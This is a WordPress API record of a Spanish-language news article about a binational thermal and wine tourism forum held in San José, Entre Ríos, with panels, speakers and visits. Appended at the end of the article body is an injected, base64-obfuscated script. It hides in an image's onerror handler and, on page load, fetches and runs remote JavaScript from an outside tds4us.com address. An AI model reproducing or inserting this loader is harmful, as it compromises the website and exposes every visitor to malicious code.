{"id":9575,"date":"2025-05-19T10:59:38","date_gmt":"2025-05-19T13:59:38","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9575"},"modified":"2025-08-13T15:28:22","modified_gmt":"2025-08-13T18:28:22","slug":"referentes-del-turismo-termal-y-del-vino-se-reunieron-por-primera-vez-en-san-jose","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9575","title":{"rendered":"Referentes del turismo termal y del vino se reunieron por primera vez en San Jos\u00e9."},"content":{"rendered":"\n<p><strong><em>La ciudad entrerriana fue epicentro desde el jueves de una exitosa primera edici\u00f3n del Foro Binacional de Termalismo y Enoturismo, donde estuvieron presentes complejos termales, bodegas, c\u00e1maras de turismo, del agua y del vino, funcionarios p\u00fablicos, empresarios y sector acad\u00e9mico.<\/em><\/strong><\/p>\n\n\n\n<p>El evento cont\u00f3 con el apoyo de la Corporaci\u00f3n Vitivin\u00edcola Argentina COVIAR, el Instituto Nacional del Vino de Uruguay INAVI, la C\u00e1mara Argentina del Agua, la Secretar\u00eda de Turismo Ambiente y Deporte de la Naci\u00f3n, la Secretar\u00eda de Turismo de la provincia de Entre R\u00edos y la C\u00e1mara Entrerriana de Turismo.<\/p>\n\n\n\n<p>En la ma\u00f1ana del jueves el presidente municipal de San Jos\u00e9, acompa\u00f1ado por Secretario de Turismo de Entre R\u00edos, Jorge Satto y representantes del sector privado dej\u00f3 formalmente inaugurado el foro. Estuvieron presentes adem\u00e1s el Presidente Municipal de Col\u00f3n, Jos\u00e9 Luis Walser y de Villa Elisa, Susana Lambert, el presidente del Ente Regulador de Recurso Termales ERRTER, Aldo Monta\u00f1ana, el Secretario de Turismo de Paysand\u00fa, Jos\u00e9 Manuel Galv\u00e1n y la jefa de Enoturismo de INAVI Uruguay, Mafia Paula Vila, entre otros.<\/p>\n\n\n\n<p>Una vez finalizada la ceremonia inaugural, comenz\u00f3 la din\u00e1mica de paneles. El primero de los cont\u00f3 con la presentaci\u00f3n de Turismo Entre R\u00edos por parte del Dr. Jorge Satto, la experiencia del reconocido en\u00f3logo uruguayo Gabriel Leoni, las perspectivas de la industria del agua en Argentina a trav\u00e9s de la CEO de la C\u00e1mara Argentina del Agua, Gonzalo Meschengieser y la propuesta de Balnearios Termales y Enoturismo en Galicia contada por el diputado gallego Juan Manuel Casares G\u00e1ndara. Una Mesa Binacional de Turismo del Vino, experiencia en ambas m\u00e1rgenes.\u00a0<\/p>\n\n\n\n<p>Uno de los momentos m\u00e1s esperados de la jornada fue el primer encuentro entre referentes de las dos principales unidades ejecutoras de turismo del vino de Argentina y Uruguay. Diego Cortes (COVIAR) y Mar\u00eda Paula Vila (INAVI) coincidieron en la importancia del trabajo articulado para potenciar la actividad vitivin\u00edcola a trav\u00e9s del turismo, como herramienta de desarrollo y expansi\u00f3n de las bodegas de esta regi\u00f3n, un sector en franco crecimiento en el litoral de ambos pa\u00edses, con una larga tradici\u00f3n en cooperaci\u00f3n.<\/p>\n\n\n\n<p>En este mismo marco, Paula Durand de la Secretar\u00eda de Turismo de Entre R\u00edos present\u00f3 oficialmente el programa de consultor\u00edas para termas que ser\u00e1n financiadas por el Fondo Multisectorial de Salto Grande, con el prop\u00f3sito de mejorar la calidad de los servicios ligados al termalismo en la provincia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sanjose.tur.ar\/wp-content\/uploads\/2025\/05\/IMG_5560.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>El cierre de la primera jornada de disertaciones estuvo centrada en las nuevas y diversas experiencias de turismo y producci\u00f3n de nuestra regi\u00f3n: el recorrido binacional y bimodal entre Concordia y Salto, la Experiencia Enotermal y el glamping en un vi\u00f1edo en San Jos\u00e9, el trabajo articulado entre el sector acad\u00e9mico y la terma del Departamento Paysand\u00fa, el cl\u00faster de vinos de Tierra de Palmares, el valor agregado de la nuez pec\u00e1n y la propuesta de turismo wellness desarrollada en Victoria.<\/p>\n\n\n\n<p><strong>Workshop, visitas y espacios de intercambio.<\/strong><br>Las jornadas estuvieron marcadas por un concurrido workshop tur\u00edstico, que se mont\u00f3 lindero al sal\u00f3n de las presentaciones, con la participaci\u00f3n de destinos, bodegas, agencias de viajes y emprendimiento ligados al termalismo y el vino de Col\u00f3n, Gualeguaych\u00fa, Federaci\u00f3n, La Paz, Victoria, Concordia, Villaguay, Villa Elisa y Paysand\u00fa. Adem\u00e1s, hubo una parte social con una Pe\u00f1a de Bienvenida en Establecimiento Los Franco Suizos, una cena de clausura y visitas al Museo Hist\u00f3rico Regional de la Colonia San Jos\u00e9, la Bodega Vulliez Sermet y el complejo Termas San Jos\u00e9.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sanjose.tur.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_122102_942.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p><strong>Viernes de presentaciones, gobernanza y comunicaci\u00f3n.<\/strong><\/p>\n\n\n\n<p>El viernes el panel de profesionales del sector coincidi\u00f3 en la necesidad de consolidar estrategias entre los sectores acad\u00e9micos, p\u00fablicos y privados. M\u00e1s tarde, el panel de gobernanza integrado por el Ministro de Turismo de La Rioja, Gustavo Luna, la diputada nacional, Carolina Gaillard, el director general de Turismo de Entre R\u00edos, Sebasti\u00e1n Bel y los representantes de la Secretar\u00eda de Turismo de la Naci\u00f3n, Mat\u00edas Teves y Juan Montero fue clave para conocer miradas y perspectivas sobre el sistema tur\u00edstico, y como a trav\u00e9s de estos espacio de discusi\u00f3n podemos consolidar herramientas para el crecimiento sostenible de nuestros destinos.<\/p>\n<p>\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sanjose.tur.ar\/wp-content\/uploads\/2025\/05\/IMG_5834.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>En el retome de la tarde, el intendente Bastian volvi\u00f3 al estrado junto a la Lic. Teresita Van Strate para recibir virtualmente a Rogelio Mart\u00ednez, gerente de Expourense desde Espa\u00f1a y a Germ\u00e1n Camacho, alcalde de Paipa desde Colombia para la presentaci\u00f3n oficial para Argentina y Uruguay de Termatalia 2025. La feria de turismo termal, bienestar y salud m\u00e1s importante del mundo tendr\u00e1 lugar en septiembre, por quinta vez en Am\u00e9rica y por primera vez en Colombia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sanjose.tur.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_122255_666.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Casi sobre el final, en un panel integrado por empresarios, influencers y otros actores del sector plantearon las nuevas oportunidades y desaf\u00edos que ofrece la comunicaci\u00f3n, el marketing, las redes y las nuevas tecnolog\u00edas en el futuro del turismo, adem\u00e1s de una presentaci\u00f3n de experiencias de destinos de nuestra provincia.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105019_372-370x370-1.webp\"><img decoding=\"async\" width=\"370\" height=\"370\" data-id=\"9580\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105019_372-370x370-1.webp\" alt=\"\" class=\"wp-image-9580\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105019_372-370x370-1.webp 370w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105019_372-370x370-1-300x300.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105019_372-370x370-1-150x150.webp 150w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105019_372-370x370-1-320x320.webp 320w\" sizes=\"(max-width: 370px) 100vw, 370px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_5666-370x370-1.webp\"><img decoding=\"async\" width=\"370\" height=\"370\" data-id=\"9579\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_5666-370x370-1.webp\" alt=\"\" class=\"wp-image-9579\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_5666-370x370-1.webp 370w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_5666-370x370-1-300x300.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_5666-370x370-1-150x150.webp 150w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_5666-370x370-1-320x320.webp 320w\" sizes=\"(max-width: 370px) 100vw, 370px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105053_317-370x370-1.webp\"><img decoding=\"async\" width=\"370\" height=\"370\" data-id=\"9576\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105053_317-370x370-1.webp\" alt=\"\" class=\"wp-image-9576\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105053_317-370x370-1.webp 370w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105053_317-370x370-1-300x300.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105053_317-370x370-1-150x150.webp 150w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/IMG_20250517_105053_317-370x370-1-320x320.webp 320w\" sizes=\"(max-width: 370px) 100vw, 370px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Ya en las conclusiones, la Secretaria de Turismo de San Jos\u00e9, Anabela Lubo, agradeci\u00f3 a quienes colaboraron con el desarrollo del evento desde diversos \u00e1mbitos, asegurando su \u00e9xito y trascendencia, adem\u00e1s destac\u00f3 la oportunidad que se brind\u00f3 para fortalecer alianzas entre prestadores de servicios, promover el asociativismo p\u00fablico-privado y explorar nuevas oportunidades para potenciar destinos cada vez m\u00e1s sostenibles y competitivos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/sanjose.tur.ar\/referentes-del-turismo-termal-y-del-vino-se-reunieron-por-primera-vez-en-san-jose-2\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/sanjose.tur.ar\/wp-content\/uploads\/2020\/05\/logo-San-Jos%C3%A9-Entre-R%C3%ADos.png\" alt=\"\" style=\"width:110px;height:auto\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup>Fuente de la Informaci\u00f3n: <\/sup><\/em><\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ciudad entrerriana fue epicentro desde el jueves de una exitosa primera edici\u00f3n del Foro Binacional de Termalismo y Enoturismo, donde estuvieron presentes complejos termales, bodegas, c\u00e1maras de turismo, del agua y del vino, funcionarios p\u00fablicos, empresarios y sector acad\u00e9mico. El evento cont\u00f3 con el apoyo de la Corporaci\u00f3n Vitivin\u00edcola Argentina COVIAR, el Instituto Nacional [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9581,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,29,28,15],"tags":[],"class_list":["post-9575","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-datos-utiles","category-portales-de-servicios-e-informacion","category-turismo-de-bienestar"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9575"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9575\/revisions"}],"predecessor-version":[{"id":9923,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9575\/revisions\/9923"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9581"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}